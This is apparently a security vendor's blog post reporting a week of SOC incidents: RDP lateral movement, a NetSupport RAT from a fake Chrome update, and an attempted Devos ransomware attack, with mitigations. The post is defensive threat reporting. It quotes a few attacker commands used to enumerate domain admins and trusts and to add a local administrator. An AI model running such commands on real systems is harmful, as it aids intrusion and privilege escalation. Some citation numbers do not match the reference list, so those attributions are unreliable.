Between May 01-08, 2024, Blackpoint’s Active Security Operations Center (SOC) responded to 117 total incidents. These incidents included 18 on-premises MDR incidents, 2 Cloud Response for Google Workspace, and 97 Cloud Response for Microsoft 365 incidents, with confirmed or likely threat actor use of:

In this blog, we’ll dive into the details behind these select incidents, including why they’re important for partners to account for today – even if they’ve not been attacked yet! – as well as possible mitigations leveraging your current tech stack and Blackpoint Cyber.

Return to Top

RDP for Lateral Movement Incident with Professional & Commercial Services Partner on May 04, 2024

Topline Takeaways

  • Industry target: Professional & Commercial Services
  • Attacker information:
    • RDP
    • NetScan
    • Powershell_Custom.exe
    • CMD_Custom.exe
    • 7zG.exe
  • Antivirus (AV) and / or EDR present in environment? Yes
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is very likely that threat actors will continue to use RDP to exploit other Professional & Commercial Services organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Least-privilege access controls
    • Multifactor authentication (MFA)
    • Proper firewall configurations
    • Incident response plans (IRPs)

Remote Desktop Protocol (RDP) Incident Timeline for May 04, 2024

  • Blackpoint’s MDR+R alerted Active SOC analysts to a Professional & Commercial Service’s user account enumerating domain trusts and targeting all trusts and domain controllers in the managed host environment.
  • During the initial investigation, the compromised user account performed netscans and pinged Google to check for network connectivity, using RDP to then access additional hosts and servers.
  • Active SOC analysts isolated all impacted hosts and the compromised user account, and contacted the Professional & Commercial Services partner to discuss the incident and provide additional remediation advice.
  • Post incident investigation determined that:
    • The compromised user account provided threat actor’s initial access into the managed endpoint and environment. The user had received multiple illegitimate MFA attempts approximately 20 minutes before the MDR+R alert, at which point the account’s password was changed; and
    • The compromised user account had fetched three malicious files from another server – “Powershell_Custom.exe”, “CMD_Custom.exe”, and “7zG.exe” – that investigators subsequently removed.

More About Remote Desktop Protocol (RDP) Abuse and Net.exe

Click for details

Remote Desktop Protocol (RDP)

Remote Desktop Protocol (RDP) is a protocol that allows users to use a desktop remotely, often used for two legitimate professional purposes:

  1. Remote Desktop Access: Users can utilize remote access to their physical desktop computer from another device.
  2. Remote Administration: Users can perform remote administrative work by accessing the device.

However, threat actors can abuse RDP to move laterally through compromised networks. They initially target RDP on victim endpoints through a variety of methods (1), including:

  • Hijacking legitimate RDP sessions;
  • Using accessibility features, such as Sticky Keys;
  • Brute force attacks;
  • Malware specifically designed to target and take over RDP; and
  • Protocol tunneling.

Net.exe

Net.exe is the net command, which allows users to view and manage (2):

  • Network shares,
  • User accounts,
  • Group memberships,
  • Services, and
  • Print queues.

Blackpoint Active SOC analysts, the APG, and other researchers have seen threat actors using the Net.exe command to enumerate domains and user accounts as part of a “living off the land” (LotL) strategy, abusing allowlisted applications to mask malicious activity and evade AV and EDR solutions. Once enumerated, threat actors can then use them for lateral movement to more strategic endpoints during a cyberattack.

APG Threat Analysis of Remote Desktop Protocol (RDP) Abuse and Net.exe for 2024

Click for details

The APG predicts that threat actors will very likely continue to use the Net.exe command and remote desktop protocol (RDP) for lateral movement over the next 12 months.

We base this assessment on the APG’s previous research tracking 37 ransomware operators that abuse the “net” command to discover user accounts, domain accounts, and more for lateral movement and privilege escalation during reported incidents from the Blackpoint Active SOC managed environment. An additional 29 ransomware operations that have been observed abusing RDP for lateral movement.

Other external researchers have also observed similar behaviors in their environments and incidents, as well. In 2024, for example, Trend Micro researchers observed Black Basta ransomware operators using the “net” command during an attack. Specifically, they used:

  • “net.exe group “Domain Admins” /domain”,
  • “nltest.exe /domain_trusts /all_trusts”, and
  • “net.exe localgroup Administrators Adminis /add”

– to enumerate domain admin accounts, domain trusts, and add new users to the local administrators group. (3)

Recommended Remote Desktop Protocol (RDP) and Net.exe Abuse Mitigations and Remediations

Click for details

Blackpoint APG recommends the following actions to help mitigate the malicious use of these legitimate tools.

  • Least-privilege access controls, to help ensure that users only have access to the data and resources required to complete their job functions.
  • Multifactor authentication (MFA) enforced on all user accounts – but especially those with privileged access – to help decrease the chances of undetected credential compromise.
  • Establishing adequate firewall rules, including restricting access to port 3389 and blocking RDP traffic between network security zones.
  • Incident response plan (IRP) creation, testing, and implementation when necessary. IRPs should include emergency processes for data backup and restoration; notification processes – including internal and external partners, team members, and law enforcement; and ensuring business continuity.

Return to Top

NetSupport RAT Incident with Industrials Partner on May 06, 2024

Topline Takeaways

  • Industry target: Industrials
  • Attacker information:
    • Update_123.0.6312.111.js
    • ah.zip
    • NetSupport RAT
  • Antivirus (AV) and / or EDR present in environment? Yes
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is likely that threat actors will continue to use NetSupport RAT to exploit other Industrials organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Multifactor authentication (MFA)
    • Heuristics-based activity monitoring and remediation
    • Dedicated software center

NetSupport RAT Incident Timeline for May 06, 2024

  • Blackpoint MDR+R alerted our Active SOC team to suspicious PowerShell execution on an Industrials partner host.
  • Initial investigation found the PowerShell activity sourced from the file “Update_123.0.6312.111.js”, which attempted to access a payload file “ah.zip” from the web, which turned out to be a NetSupport RAT. Both payload and PowerShell script leveraged obfuscation techniques in an effort to hide their activities from EDR and AV solutions, including base64 encoding.
  • Active SOC analysts isolated the infected host to prevent additional malicious activity, after which the team contacted the Industrials partner to inform them of the incident and provide additional context and remediation advice.
  • Post-incident analysis revealed that the initial infection was caused by the infected user trying to download a Google Chrome update.

More About the NetSupport RAT

Click for details

The NetSupport RAT (Remote Access Trojan) is a version of the legitimate NetSupport Manager, which is a remote support application. The NetSupport RAT is a versatile tool that allows threat actors to act in multiple ways, including:

  • Monitoring user behaviors,
  • Keylogging,
  • Transferring or exfiltrating files,
  • Taking control of system resources, and / or
  • Moving laterally to other devices connected on the network.

NetSupport RAT is often downloaded via fake websites and fake browser updates; however, initial access vectors vary depending on the group using the malware. In 2023, for example, an unknown threat group conducted a campaign delivering the NetSupport RAT by tricking users into downloading fake Google Chrome updates – very similar to the attack vector for this incident. The infected website hosted a PHP script that appeared to be a legitimate Chrome update. In this incident, “Update_browser_10.6336.js” was the downloaded payload from the fake browser update. (4)

As the NetSupport RAT is both used legitimately (as NetSupport Manager) and as a RAT, it is difficult to spot by traditional AV or EDR solutions, and is not restricted in use to a single threat actor or group, making attacker attribution more difficult.

APG Threat Analysis of NetSupport RAT for 2024

Click for details

The APG predicts that threat actors will likely continue to use remote access trojans, such as the NetSupport RAT, specifically for persistence over the next 12 months.

We base this assessment on recent and varied threat actor use of the tool in multiple industries and situations:

  • In January 2024, eSentire reported a NetSupport RAT campaign spread via fake browser updates (5).
  • In March 2024, Perception Point researchers reported a new “Operation PhantomBlu” threat campaign, which featured a NetSupport RAT campaign delivered via social engineering messages with malicious attachments (6).

Recommended NetSupport RAT Mitigations and Remediations

Click for details

Blackpoint APG recommends the following actions to help mitigate the deployment and use of NetSupport RATs and similar malware by threat actors.

  • Multifactor authentication (MFA) and VPN use where feasible to ensure only identified and authorized employees can access sensitive data and resources with an additional level of credential authentication.
  • Employ heuristics-based activity monitoring and remediation to detect unusual user behaviors and activities that could indicate malicious activity or compromised accounts within the managed environment that would otherwise be missed by more traditional security solutions, such as AV or EDR.
  • Provide a dedicated software center to guarantee employees can easily access the applications and updates required for their jobs from a safe and monitored location… without forcing them to “go rogue” and accidentally download malware from a malvertising or SEO poisoned instance.

Return to Top

Devos Ransomware Incident with Healthcare Partner on May 07, 2024

Topline Takeaways

  • Industry target: Healthcare
  • Attacker information:
    • VSSAdmin
    • svchost.exe
    • Fast.exe
    • dControl.ini
    • dControl.exe
    • taskmgr[on].reg
    • taskmgr[off].reg
    • devos-####[at]zohomail[.domain]
  • Antivirus (AV) and / or EDR present in environment? Yes
  • Threat assessment for partners:
    • The Adversary Pursuit Group (APG) predicts that it is almost certain that threat actors will continue to use Devos Ransomware to exploit other Healthcare organizations over the next 12 months.
  • Recommended remediations and mitigations:
    • Employee security training
    • Create and maintain data backups
    • Least-privilege access controls
    • Regularly audit both environment and endpoints

Devos Ransomware and VSSAdmin Incident Timeline for May 07, 2024

  • Within a 3-minute window, a threat actor compromised an RDP connection on a Healthcare partner’s endpoint from an IP address in Great Britain, with the threat actor staging files from “C:\Users\$username\Music\devos-[####]@zohomail[.domain]\”.
    • Blackpoint’s Ransomware Response technology automatically halted the ransomware’s attempted deployment before a material breach occurred.
  • Simultaneously, Blackpoint MDR+R technology alerted Active SOC analysts to Vssadmin being deleted and the Blackpoint canary files being overwritten by an executable “svchost.exe” stored in the music folder.
  • Blackpoint’s MDR+R immediately suspended the malicious process while the Active SOC analyst team began investigating, which retroactively uncovered the initial compromise and attempted ransomware deployment.
  • Our Active SOC analysts also isolated the infected device to prevent further malicious activity, and contacted the Healthcare partner to inform them of the incident and advise on additional mitigations and remediation steps.
  • Additional post-incident analysis by the Blackpoint APG confirmed the activity to be related to the Devos ransomware operation.

More About Devos Ransomware

Click for details

The Blackpoint APG and other security researchers have assessed the Devos ransomware package as a variant of the older Phobos ransomware family, active since 2019.

Similar to previous incidents described in this analysis, researchers have seen Devos ransomware operators historically using the Remote Desktop Protocol (RDP) for lateral movement during reported incidents (7), which is in line with the APG’s assessment of overall recent ransomware landscape threat activity trends.

APG Threat Analysis of Devos Ransomware for 2024

Click for details

The APG predicts that threat actors will almost certainly continue to use Devos ransomware over the next 12 months.

We base this assessment on internal incident report analysis of Blackpoint Active SOC incident reports of managed environments, as well as recent external reports of more active use of the ransomware package.

Specifically, in May 2024, Trend Micro researchers reported that Phobos ransomware was the second most detected ransomware operation in Q1 2024, following the LockBit operation (8).

At a strategic level, ransomware in general has repeatedly posed a critical threat to organizations worldwide over the previous decade, with attacks increasing year over year, per the APG’s own internal tracking and analysis.

Despite law enforcement and government attention and disruption, ransomware operators have little incentive to cease operations. Additionally, many groups that shut down operations or are disrupted by law enforcement operations return to the landscape with rebranding or under the affiliate program of another group, which was evidenced in the recent criminal cases of:

  • REvil (9),
  • Conti (10),
  • LockBit (11),
  • ALPHV / BlackCat (12), and others.

Therefore, it is practically certain that ransomware operators and affiliates will continue to target organizations across all verticals, continuing to abuse RDP, Vssadmin, and similar legitimate services and tools over the next 12 months.

Recommended Devos and Similar Ransomware Mitigations and Remediations

Click for details

Blackpoint APG recommends the following actions to help mitigate the deployment of ransomware overall. (Note that these mitigations are not specific to any ransomware operation, as many criminal gangs demonstrate similar behaviors. By employing these techniques, you should greatly reduce your exposed attack surface to many ransomware attempts – not simply that of Devos.)

  • Employee security training remains a strong “insurance policy” of sorts for your most exposed security liabilities: your end users. They must repeatedly be exposed to what basic phishing and malvertising lures look like, and be more cautious about opening email attachments or clicking on sponsored ads in search results.
  • Create and maintain data backups, including offline backups that are kept separate from the network and system. Should your system suffer a lockout from a ransomware attempt, your uncorrupted and easily reinstated data backups become a key part of your business continuity plan to resume regular operations.
  • Least-privilege access controls help ensure that users only have access to the data and resources required to complete their job functions, making it harder for threat actors to move laterally within the infected environment to more desireable targets.
  • Regularly audit both environment and endpoints to identify weak points, apply necessary patching requirements, and close potential infection paths.

References and Resources

A quick note on incident details:

As these analyses concern recent incidents in actively monitored environment, certain details may be occasionally omitted and / or obfuscated, to better secure our partners and protect any still-ongoing investigations.

However, we felt that these incidents were important enough to bring to the community’s attention as fast as possible, and so included them in this public writeup.

Please feel free to reach out to the APG directly if you have any questions about a specific incident!

Click for full reference list
  1. ReliaQuest’s Blog: “Scattered Spider Attack Analysis” by James Xiang on 2023 November 21
  2. Blackpoint Cyber’s Blog: “How RDP Attacks Go Down” by Blackpoint Cyber on 2022 May 31
  3. SpyShelter’s Blog: “What’s net.exe (Net Command)? Is it safe or a virus?” by SpyShelter on 2024 February 15
  4. Trend Micro’s Blog: “Threat Actor Groups, Including Black Basta, are Exploiting Recent ScreenConnect Vulnerabilities” by Ian Kenefick, Junestherry Dela Cruz, and Peter Girnus on 2024 February 27
  5. Vmware’s Blog: “NetSupport RAT: The RAT King Returns” by Alan Ngo, Abe Schneider, and Fae Carlisle on 2023 November 20
  6. eSentire’s Blog: “SmartApeSG Delivering NetSupport RAT” by eSentire Threat Response Unit (TRU) on 2024 January 18
  7. Perception Point’s Blog: “Operation PhantomBlu: New and Evasive Method Delivers NetSupport RAT” by Ariel Davidpur and Peleg Cabra on N/A
  8. 360 Total Security’s Blog: “Analysis of Ransomware Outbreak in March 2020” by kate on 2020 April 28
  9. Trend Micro’s Blog: “PHOBOS EMERGES AS A FORMIDABLE THREAT IN Q1 2024, LOCKBIT STAYS IN THE TOP SPOT” by Trend Micro on 2024 May 07
  10. Secure MSP’s Blog: “REvil ransomware gang returns after two-month hiatus” by Eric Swotinsky on 2021 September 17
  11. Global Initiative’s Blog: “The rise and fall of the Conti ransomware group” by Jack Meegan-Vickers on 2023 June 27
  12. U.S. DoJ’s Press Release: “U.S. and U.K. Disrupt LockBit Ransomware Variant” by Office of Public Affairs on 2024 February 20
  13. U.S. DoJ’s Press Release: “Justice Department Disrupts Prolific ALPHV/Blackcat Ransomware Variant” by Office of Public Affairs on 2023 December 19